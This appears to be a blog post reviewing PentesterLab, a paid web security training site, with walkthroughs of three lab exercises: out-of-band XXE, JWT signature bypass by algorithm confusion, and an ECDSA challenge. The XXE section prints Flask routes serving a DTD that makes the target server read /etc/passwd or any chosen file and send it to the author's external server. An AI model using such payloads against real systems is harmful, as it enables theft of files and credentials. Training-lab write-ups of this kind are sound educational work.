After completing my fourth badge on PentesterLab, I have enjoyed it so much that I thought I would spread the word about what a great learning resource it is. If I had to summarise it in one sentence, I would say it is an extremely well written educational site about web application pentesting that caters to all skill levels and makes it easy to learn at an incredibly affordable price (US$20 per month for pro membership, with no minimum number of months and no annoying auto-renewal at signup). If you are uncertain whether it is for you, start by checking out the free content.

Without pro membership, you can still download many ISOs and try the exercises yourself locally. However, with the pro membership you get more content, and you avoid the overhead of downloading ISOs, spinning up VMs, and related activities.

This blog is about what you will get out of it and what you should know going in. In my opinion, the best way to do justice in describing PentesterLab is to talk about some of the exercises on the site. So at the end of the blog, I dive down into the technical fun stuff, describing three of my favourites. If none of those exercises pique your interest, then never mind!

For the record, I have no connection to the site author, Louis Nyffenegger. I have never met him, but I have exchanged a few emails with him in regard to permission to blog about his site. My opinion is thus unbiased — my only interest is blogging about things that I am passionate about, and PentesterLab has really worked for me.

What you can expect to learn

A few examples of what you can expect to learn from PentesterLab:

- An introduction to web security, through any of the Web for Pentesters courses, the Essential badge, the Introduction badge, or the bootcamp.

- Advanced penetration testing that often leads to web shells and remote code execution, in the White badge, Serialize badge, Yellow badge, and various other places. Examples of what you get to exploit include Java deserialization (and deserialization in other languages), Shellshock, out-of-band XXE, a recent Struts 2 vulnerability (CVE-2017-5638), and more.

- The practical experience of breaking real world cryptography through exercises such as Electronic Code Book, Cipher Block Chaining, Padding Oracle, and ECDSA. Note: Although the number of crypto exercises here cannot compete with CryptoPals (which is exclusively about breaking real world cryptography), at least at PentesterLab you get certifications (badges) as evidence of your acquired skills.

- Practical experience bypassing crypto when there is no obvious way to break it, such as in API to shell, JSON Web Token, and JSON Web Token II.

- Practical experience performing increasingly sophisticated man-in-the-middle attacks in the Intercept badge.

- Fun challenges that will really make you think in the Capture the flag badge.

The author is updating the site all the time, and it is clear that more badges and exercises are on the way.

In addition to learning lots of new attacks on web applications, I can also say that I personally picked up a few more skills that I was not expecting:

- Learning some functionality of Burp Suite that I had not known existed. I thought I knew it well before I started, but it turns out that there were a number of little things that I did not know, often picked up by watching the videos (only available via pro membership).

- Learning more about various types of encoding and how to do it in the language I choose (in my case, Python). The Python functionality I needed was not given to me from the site, but I was drawn to learn it as I was trying to solve various challenges. For example, I now know how the padding works in base64 (which is important because not all of the encodings I got from challenges were directly feedable into Python), and I learned about the very useful urllib.quote.

- Getting confidence in fiddling with languages that I had little experience in, such as PHP and Ruby.
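To make the encoding point in the list above concrete, here is a minimal Python 3 sketch. It assumes the challenge hands you base64 (standard or URL-safe) with the trailing `=` padding stripped, which is a common case but not necessarily what every exercise does. The helper name `b64decode_unpadded` is made up for this example, and note that in Python 3 the old `urllib.quote` lives at `urllib.parse.quote`.

```python
import base64
from urllib.parse import quote

def b64decode_unpadded(data):
    """Decode standard or URL-safe base64 whose '=' padding was stripped."""
    # base64 text comes in groups of 4 characters; restore the missing '='.
    data += "=" * (-len(data) % 4)
    # urlsafe_b64decode maps '-' and '_' back to '+' and '/' before decoding,
    # so it handles both alphabets.
    return base64.urlsafe_b64decode(data)

print(b64decode_unpadded("YWRtaW4"))   # 7 characters, so one '=' is added

# Percent-encode a value before placing it in a URL; safe="" also encodes '/'.
print(quote("a b&c=d/e", safe=""))
```

The padding trick works because `-len(data) % 4` is exactly the number of characters needed to reach the next multiple of four.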

What you should know going in

What you need depends upon what exercises you choose to do, but I expect most people will be like me: wanting to get practical experience exploiting major vulnerabilities that don’t always fall into the OWASP Top 10. For such people, I say that you need to be comfortable with scripting and fiddling around with various programming languages, such as Ruby, PHP, Python, Java, and C. If you haven’t had experience with all of these languages, that’s okay: there are good videos (pro membership) that help enormously. The main thing is that you must not be afraid to try, and there may be times when you need to Google for an answer. But most of the time, you can get everything you need directly from PentesterLab.

I personally like to use Cygwin on Windows and/or a Linux virtual machine. The vast majority of the time, I was able to construct the attack payload myself (with help from PentesterLab), but there are a few exercises such as Java Deserialization where you need to run somebody else’s software (in this case, ysoserial). Although that comes from very reputable security researchers, being ultra-paranoid, I prefer to run software I don’t know on a virtual machine rather than my main OS.

If you are an absolute beginner in pentesting and have no experience with Burp, I think that you will be okay. But you will likely depend upon the videos to get you started. The video in the first JWT exercise will introduce you to setting up Burp and using the most basic functionality that you will need. By the way, I have done everything using the free version of Burp, so no need to buy a licence (until you’re ready to chase bug bounties!)

Quality of the content

For each exercise there is a course with written material, an online exercise (pro membership only — others can download the ISO), and usually there are videos (pro members only).

You can see examples of the courses in the free section, and I think the quality speaks for itself. With pro membership, you get a lot more of this high quality course material. The only thing that I would suggest to the author is that including a few more external references for interested readers could be helpful. For example, the best place to learn about Java deserialization is FoxGlove Security, so it would be great to include the reference.

The videos really raise the bar. How many times have you struggled through a YouTube video showing how to perform an attack, frustrated by the presentation? You know, those videos where the author stumbles through typing the attack description (never talking), with bad music in the background? Maybe you had to search a few times before finding a video that is reasonably okay. Well, not here: all the videos are very high quality. The author talks you through it and has clearly put a lot of thought into explaining the steps to those who do not have the experience or background with the attack.

Last, the online exercises are perfect: simple and to the point, allowing us to try what we learned.

Sometimes the supporting content is enough for you to do an entire exercise; other times you have to think a bit. Many videos are spoilers: they show you how to solve the exercise completely (or almost completely). It is usually best to try yourself before falling back on the videos, because you won’t get more out of it than what you put into it.

Finally, I want to compare the quality of PentesterLab to some other educational material that I have learned a lot from:

- OSCP, which is infrastructure security as opposed to the web application security from PentesterLab. OSCP is the #1 certification in the industry, and is at a very reasonable price. It also has top quality educational material. I learned a lot doing OSCP, but the problem is that I did not complete it. I ran out of time (wife and kids were beginning to forget who I was) to work on it. And despite having picked up so many great skills from enrolling, at the end of the day it never helped me land a pentester job close to my desired salary level. I guess I needed to just try harder. The great thing about PentesterLab is that it’s not an all or nothing deal: you will pick up certification (badge) after certification (badge) as you go along. In terms of quality comparison, I’d say PentesterLab material is on par with OSCP.

- WebGoat is the go-to free application for learning about penetration testing. I played with it a few years ago and learned a fair amount. There were a few exercises that I did not know how to solve, and I was rather frustrated that the tool did not help me. For example, in one of the SQL injection exercises, I needed to know how to get the column names in the database schema in order to solve it (I want to understand rather than just sqlmap it). I really think the software should have provided me some guidance on that (I know how to do that now, thanks to PentesterLab). PentesterLab just provides a lot more guidance and support, and has a lot more content.

- Infosec Institute in my experience has been a fantastic source of free information to help learn application security. It covers a wide variety of topics in very good detail. But it lacks the nice features you get with PentesterLab pro membership: videos, and the ability to try online without the overhead of fetching resources from other places to get set up. If your time is precious, the US$20 per month is nothing in comparison to what you gain from PentesterLab pro.

What most amazes me is that just about all of the content here was primarily made by a single person. Wow.

Three example exercises I really liked

Exercise: Play XML Entities (Out of band XXE)

XXE is a fun XML vulnerability that can allow an attacker to read arbitrary files on the vulnerable system. Although many XXE vulnerabilities are easy to exploit, there are other times where the vulnerability exists but the file you are trying to read from the OS does not get directly returned to you. In such cases, you can try an out of band XXE attack, which is what the Play XML Entities exercise is all about.



In the course the author provides an awesome diagram of how it all works, which he explains in detail:

(Diagram copyright Louis Nyffenegger, used with his permission).

Briefly, the attacker needs to set up his own server (“Attacker’s server” in the diagram) that serves a DTD. The attacker sends malicious XML to the vulnerable server (step 1), which then remotely retrieves the attacker’s DTD (steps 2-3). The DTD instructs the vulnerable server to read a specific file from the file system (step 4) and send its contents to the attacker’s server (step 5).

So to start out, you need your own web server that the vulnerable application will fetch a DTD from. In this case, you are a bit on your own on what server you are going to use. I personally have experience with Heroku, which lets you run up to 5 small applications for free.

PentesterLab shows how to run a small Webrick server (Ruby), but I’m more of a Python guy and my experience is with Flask. Warning: Heroku+Flask has been a real pain for me historically, but I now have it working so I just continue to go with that.

To provide a DTD that asks for the vulnerable server to cough up /etc/passwd, I did it like this in Flask:

    @app.route('/test.dtd')
    def testdtd():
        # Static DTD: read /etc/passwd, then send it to the recorddata endpoint
        dtd = '''
    <!ENTITY % p1 SYSTEM "file:///etc/passwd">
    <!ENTITY % p2 "<!ENTITY e1 SYSTEM 'https://contini-heroku-server.com/recorddata?%p1;'>">
    %p2;'''
        return dtd

The recorddata endpoint is another Flask route (code omitted) that records the /etc/passwd file retrieved from the vulnerable server (my DTD is essentially equivalent to the one from PentesterLab).
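The recorddata route itself is omitted above. Purely as an illustration of what such an endpoint has to do, and not the Flask code actually used here, this is a sketch built on Python's standard-library `http.server` instead of Flask. The names `extract_exfiltrated`, `captured`, and `RecordDataHandler` are hypothetical.

```python
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlsplit, unquote

# In-memory store for illustration; a real setup might log to a file instead.
captured = []

def extract_exfiltrated(request_target):
    """Return everything after '?' in the request target, percent-decoded."""
    # The DTD puts the file contents directly after '?', so the whole query
    # string is the data rather than a set of key=value pairs.
    return unquote(urlsplit(request_target).query)

class RecordDataHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        # Only record hits on the path that the DTD points at.
        if urlsplit(self.path).path == "/recorddata":
            captured.append(extract_exfiltrated(self.path))
        self.send_response(200)
        self.end_headers()
```

To try it locally you could run `HTTPServer(("", 8000), RecordDataHandler).serve_forever()`. Depending on the XML parser on the vulnerable side, files containing newlines or other special characters may not survive being placed in a URL, so treat this as a starting point only.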

This is all fine and dandy except one thing: /etc/passwd is not the ultimate goal in this exercise. Instead, there is a hidden file on the system somewhere that you need to find, and it contains a secret that you need to get to mark completion of the exercise. So, a static DTD like this doesn’t do what I need.

At first, I was manually changing the DTD every time to reference a different file, then re-deploying to Heroku, and then trying my attack through Burp. I thought I would find the secret file quickly, but I did not. This was way too manual, and way too slow. What an idiot I was for doing things this way.

Then I used a little intelligence and did it the right way: Make the Flask endpoint take the file name as a query string parameter, and return the corresponding DTD:

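    # Assumes `request` is imported from flask alongside the existing `app`
    @app.route('/smart.dtd')
    def dtdsmart():
        # File to read on the vulnerable server, taken from the query string
        targetfile = request.args.get('targetfile')
        dtd = '''
    <!ENTITY % p1 SYSTEM "file:///''' + targetfile + '''">
    <!ENTITY % p2 "<!ENTITY e1 SYSTEM 'https://contini-heroku-server.com/recorddata?%p1;'>">
    %p2;'''
        return dtd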

I was very proud of myself for this trivial solution. Never mind the security vulnerability in it!
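With the file name moved into a query parameter, trying a new file only means changing the XML sent through Burp. A minimal sketch of generating that XML in Python 3 follows. The root element name `foo`, the host `attacker.example`, the candidate paths, and the helper name `build_xxe_payload` are placeholders of my own; the XML that the vulnerable application actually expects will differ.

```python
from urllib.parse import urlencode

def build_xxe_payload(dtd_url, targetfile):
    """Return XML whose DOCTYPE loads the attacker's DTD for targetfile."""
    # Pass the file name to the DTD endpoint as a URL-encoded query parameter.
    system_id = dtd_url + "?" + urlencode({"targetfile": targetfile})
    return (
        '<?xml version="1.0"?>\n'
        f'<!DOCTYPE foo SYSTEM "{system_id}">\n'
        # e1 is the general entity declared by the DTD; expanding it triggers
        # the request that carries the file contents to the attacker's server.
        "<foo>&e1;</foo>"
    )

# Candidate paths are guesses for illustration only. The DTD already adds
# "file:///", so the leading slash is left off here.
for candidate in ["etc/passwd", "etc/hostname"]:
    print(build_xxe_payload("https://attacker.example/smart.dtd", candidate))
```

Each printed document can be pasted into the request body, so the DTD endpoint never needs to be redeployed.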

Overall, the course material gives a great description of what to do, but sometimes you have to bring in your own ideas to do things a better way.

Exercise: JWT II

JSON Web Tokens (JWT) are a standard way of communicating information between parties in a tamper-proof way. Except when they can be tampered with.

In fact, there is a fairly well known historical vulnerability in a number of JWT libraries. The vulnerability is due to the JWT standard allowing too much flexibility in the signing algorithm. One might speculate why JWTs were designed this way.

PentesterLab has two exercises on bypassing JWT signatures (pro members only). The first one is the most obvious way, and the way you would most likely pull it off in practice (assuming a vulnerable library). The second is a lot harder to pull off, but a lot more fun when you succeed.

In JWT II, your username is in the JWT claims, digitally signed with RSA. You need to find a way to change your username to ‘admin’, but the signature on it is trying to stop you from doing that.

To bypass the signature, you change the algorithm in the JWT from RSA (an asymmetric algorithm) to HMAC (a symmetric algorithm). The server does not know that the algorithm has changed, but it does know how to check signatures. If it is instructed to check the signature with HMAC, it will do so. And it will do it with the key it knows — not an HMAC key, but instead the RSA public key.

In this exercise, you are given the RSA public key, encoded. At a theoretical level, exploiting it may seem easy: just create your own JWT having username ‘admin’, set the algorithm to HMAC, and then sign it by treating the RSA public key like it is an HMAC key.
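At that theoretical level, the forgery can be sketched in a few lines of Python 3 using only the standard library. Several things here are assumptions rather than facts from the exercise: that the HMAC variant is HS256, that the claim is called `username`, and the helper names `b64url` and `forge_hs256`. The value of `public_key_bytes` is a placeholder, not the real key, and which exact bytes the server feeds to HMAC is deliberately not answered here.

```python
import base64
import hashlib
import hmac
import json

def b64url(raw):
    """Base64url-encode bytes without '=' padding, as JWTs require."""
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")

def forge_hs256(claims, key_bytes):
    """Build a JWT with alg=HS256, signed with HMAC-SHA256 under key_bytes."""
    header = {"alg": "HS256", "typ": "JWT"}
    # The signed data is base64url(header) + "." + base64url(claims).
    signing_input = ".".join(
        b64url(json.dumps(part, separators=(",", ":")).encode("utf-8"))
        for part in (header, claims)
    )
    signature = hmac.new(
        key_bytes, signing_input.encode("ascii"), hashlib.sha256
    ).digest()
    return signing_input + "." + b64url(signature)

# Placeholder only: substitute the public key material from the exercise.
public_key_bytes = b"-----BEGIN PUBLIC KEY-----\nplaceholder\n-----END PUBLIC KEY-----\n"
token = forge_hs256({"username": "admin"}, public_key_bytes)
print(token)
```

A server that trusts the `alg` field and passes its RSA public key to the HMAC check would accept such a token only if `key_bytes` matches, byte for byte, what the server uses.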

In practice, it’s not that simple. When I was attempting this, I was completely bothered by not knowing how to treat an RSA key as an HMAC key. I attempted it in Python, fiddling around with a few different ways of inserting the key to create the signature. None of them worked.

I thought to myself that this depends so much on implementation, and surely there must be a better way of going about things than random trials. Hmmmm, somehow the author must have left a hint on how to encode it so we can solve the exercise…

Exercise: ECDSA

According to stats on the site, ECDSA looks to be the most challenging exercise. I decided to go after it because I was once a cryptographer and I was excited to see an exercise like this.

Honestly, most people will not have the cryptographic background to do an exercise like this, particularly because ECDSA is in the capture the flag badge, so there is no guidance. You are on your own, good luck! But I’ll drop you a hint.

In the exercise, they give you the Ruby source code, which is a few dozen lines. The functionality of the site allows you to register or login only. Your goal is to get admin access.

From the source code you will see that it uses an ECDSA private key to digitally sign a cookie with your username in it. To check the cookie, it verifies the signature with the public key.

The most surprising thing here is that you don’t even get the public key (nor the private key, of course). You have to somehow find a way to create a digitally signed cookie with the admin username in it, and you have absolutely nothing to go by other than the source code.

I promised you a hint. Look for a prominent example of ECDSA being broken in the real world.

Concluding Remarks

I think it is clear that I really, really like this website and highly recommend it. Having said that, it is always better to get more than one opinion, and for that reason, I invite other users of PentesterLab to comment either here or on Reddit about their experience with the website.

Speak up people!